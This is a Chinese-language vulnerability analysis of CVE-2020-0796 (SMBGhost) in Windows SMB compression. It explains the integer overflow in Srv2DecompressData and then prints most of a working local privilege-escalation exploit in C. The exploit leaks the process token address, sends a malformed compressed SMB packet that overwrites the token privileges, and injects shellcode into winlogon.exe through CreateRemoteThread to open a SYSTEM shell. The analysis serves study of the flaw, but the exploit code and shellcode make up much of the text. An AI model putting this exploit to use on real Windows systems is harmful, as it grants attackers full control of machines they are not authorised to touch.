CVE-2020-0796 SMB Ghost 整数溢出漏洞

漏洞位置：SMB服务驱动srv2.sys和srvnet.sys

漏洞原因：用户态可控数据传入内核，SMB在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法，导致整数溢出，最后通过构造payload，实现任意地址写，替换token权限提权

漏洞分析#

SMB进程权限#

SMB服务使用端口为139和445端口，可以查到对应进程为PID，也就是权限为system的System.exe进程

因此进程token即为System token

SMB格式#

SMB Compression Transform Header的结构

• ProtocolId ：4字节，固定为0x424D53FC
• OriginalComressedSegmentSize ：4字节，原始的未压缩数据大小
• CompressionAlgorithm ：2字节，压缩算法
• Flags ：2字节，详见协议文档
• Offset/Length ：根据Flags的取值为Offset或者Length，Offset表示数据包中压缩数据相对于当前结构的偏移

漏洞位置#

OriginalCompressedSegmentSize和Offset/Length是由用户控制的数值，且为32位长度，在函数Srv2DecompressData中，由于需要先申请一块内存，因此调用SrvNetAllocateBuffer申请内存，长度参数为下面红框相加部分，由于没有检查溢出(OriginalCompressedSegmentSize+Offset)，因此溢出后可以分配到一个很小的空间

exp分析#

• 创建SMB Server的连接
• 获取自身token数据结构中privilege成员在内核中的地址tokenAddr
• 发送畸形数据触发漏洞，包含tokenAddr、权限数据、占位数据
• 触发漏洞，修改tokenAddr地址处权限数据，提升自身权限
• 控制winlogon，创建System权限shell

创建SMB连接#

  if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
	printf("Couldn't find a usable version of Winsock.dll\n");
	WSACleanup();
	return EXIT_FAILURE;
}

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == INVALID_SOCKET) {
	printf("socket() failed with error: %d\n", WSAGetLastError());
	WSACleanup();
	return EXIT_FAILURE;
}

sockaddr_in client;
client.sin_family = AF_INET;
client.sin_port = htons(445);
InetPton(AF_INET, "127.0.0.1", &client.sin_addr);

if (connect(sock, (sockaddr*)& client, sizeof(client)) == SOCKET_ERROR) {
	return error_exit(sock, "connect()");
}

printf("Successfully connected socket descriptor: %d\n", (int)sock);
   printf("Sending SMB negotiation request...\n");

if (send_negotiation(sock) == SOCKET_ERROR) {
	printf("Couldn't finish SMB negotiation\n");
	return error_exit(sock, "send()");
}

printf("Finished SMB negotiation\n");

获取自身进程token地址#

ULONG64 get_process_token() {
	HANDLE token;
	HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
	if (proc == INVALID_HANDLE_VALUE)
		return 0;

	OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token);
	ULONG64 ktoken = get_handle_addr(token);

	return ktoken;
}
--------------------------------------------------------------
    ktoken = get_process_token();
	if (ktoken == -1) {
		printf("Couldn't leak ktoken of current process...\n");
		return EXIT_FAILURE;
	}
	printf("Found kernel token at %#llx\n", ktoken);

准备payload#

   ULONG buffer_size = 0x1110;
UCHAR *buffer = (UCHAR *)malloc(buffer_size);
if (buffer == NULL) {
	printf("Couldn't allocate memory with malloc()\n");
	return error_exit(sock, NULL);
}
   
   memset(buffer, 'A', 0x1108);
*(uint64_t*)(buffer + 0x1108) = ktoken + 0x40; /* where we want to write */

构造并发送压缩后的数据#

int send_compressed(SOCKET sock, unsigned char* buffer, ULONG len) {
	int err = 0;
	char response[8] = { 0 };

	const uint8_t buf[] = {
		/* NetBIOS Wrapper */
		0x00,
		0x00, 0x00, 0x33,

		/* SMB Header */
		0xFC, 0x53, 0x4D, 0x42, /* protocol id */
		0xFF, 0xFF, 0xFF, 0xFF, /* original decompressed size, trigger arithmetic overflow */
		0x02, 0x00,             /* compression algorithm, LZ77 */
		0x00, 0x00,             /* flags */
		0x10, 0x00, 0x00, 0x00, /* offset */
	};

	uint8_t* packet = (uint8_t*) malloc(sizeof(buf) + 0x10 + len);
	if (packet == NULL) {
		printf("Couldn't allocate memory with malloc()\n");
		return error_exit(sock, NULL);
	}

	memcpy(packet, buf, sizeof(buf));
	*(uint64_t*)(packet + sizeof(buf)) = 0x1FF2FFFFBC;
	*(uint64_t*)(packet + sizeof(buf) + 0x8) = 0x1FF2FFFFBC;
	memcpy(packet + sizeof(buf) + 0x10, buffer, len);

	if ((err = send(sock, (const char*)packet, sizeof(buf) + 0x10 + len, 0)) != SOCKET_ERROR) {
		recv(sock, response, sizeof(response), 0);
	}

	free(packet);
	return err;
}
-----------------------------------------------
    if (send_compressed(sock, compressed_buffer, FinalCompressedSize) == SOCKET_ERROR) {
		return error_exit(sock, "send()");
    }

注入winlogon进程，开启shell#

void inject(void) {
	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

	uint8_t shellcode[] = {
		 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x6D, 0x64, 0x00, 0x54,
		 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
		 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
		 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
		 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
		 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99,
		 0xff, 0xc2, // inc edx (1 = SW_SHOW)
		 0xFF, 0xD7, 0x48, 0x83, 0xC4,
		 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 0x00
	};

	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	int pid = -1;
	if (Process32First(snapshot, &entry) == TRUE) {
		while (Process32Next(snapshot, &entry) == TRUE) {
			if (lstrcmpiA(entry.szExeFile, "winlogon.exe") == 0) {
				pid = entry.th32ProcessID;
				break;
			}
		}
	}
	CloseHandle(snapshot);

	if (pid < 0) {
		printf("Could not find process\n");
		return;
	}
	printf("Injecting shellcode in winlogon...\n");

	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	if (hProc == NULL) {
		printf("Could not open process\n");
		return;
	}

	LPVOID lpMem = VirtualAllocEx(hProc, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (lpMem == NULL) {
		printf("Remote allocation failed\n");
		return;
	}		
	if (!WriteProcessMemory(hProc, lpMem, shellcode, sizeof(shellcode), 0)) {
		printf("Remote write failed\n");
		return;
	}	
	if (!CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, 0, 0, 0)) {
		printf("CreateRemoteThread failed\n");
		return;
	}

	printf("Success! ;)\n");
}

利用分析#

分配内存数据#

/* SMB Header */
	0xFC, 0x53, 0x4D, 0x42, /* protocol id */
	0xFF, 0xFF, 0xFF, 0xFF, /* original decompressed size, trigger arithmetic overflow */
	0x02, 0x00,             /* compression algorithm, LZ77 */
	0x00, 0x00,             /* flags */
	0x10, 0x00, 0x00, 0x00, /* offset */

溢出构造：0xffffffff+0x10溢出为0xf

0x1ff2ffffbc

0xf对应于0x1100的表项，但其实分配内存大于0x1100，为0x1100 + 0xE8 + 2*(MmSizeOfMdl + 8)

最后返回的return_buffer是一个初始化后的内存数据结构

分配后的结构如下：

return_buffer+0x18指向了0x50处的位置

解压payload#

解压函数参数含义如下：

SmbCompressionDecompress(CompressAlgo，//压缩算法
			Compressed_buf，//指向数据包中的压缩数据
			Compressed_size，//数据包中压缩数据大小，计算得到
			UnCompressedBuf,//解压后的数据存储地址，*(return_buffer+0x18)+0x10
			UnCompressedSize,//压缩数据原始大小,源于数据包OriginalCompressedSegmentSize
			FinalUnCompressedSize)//最终解压后数据大小

通过解压，将payload解压到*(return_buffer+0x18)+0x10位置，也就是图中0x60所指位置

移动payload实现攻击#

memmove((alloc_buffer+0x18)，SMB_payload，offset)

此时alloc_buffer指向tokenAddr地址，而SMB_payload则是对应的权限数据，因此可以实现替换token权限攻击

为什么是0x1ff2ffffbc#

tokenAddr+0x40是权限位置，控制当前进程权限

System进程token+0x40位置的值为0x1ff2ffffbc，因此替换后就使得当前进程拥有了System进程权限，继而通过注入其他进程获取系统权限的cmd。

参考链接#

• https://jcxp.github.io/2020/03/31/CVE-2020-0796-SMB漏洞分析/
• https://github.com/danigargu/CVE-2020-0796/blob/master/cve-2020-0796-local/exploit.cpp
• https://paper.seebug.org/1168/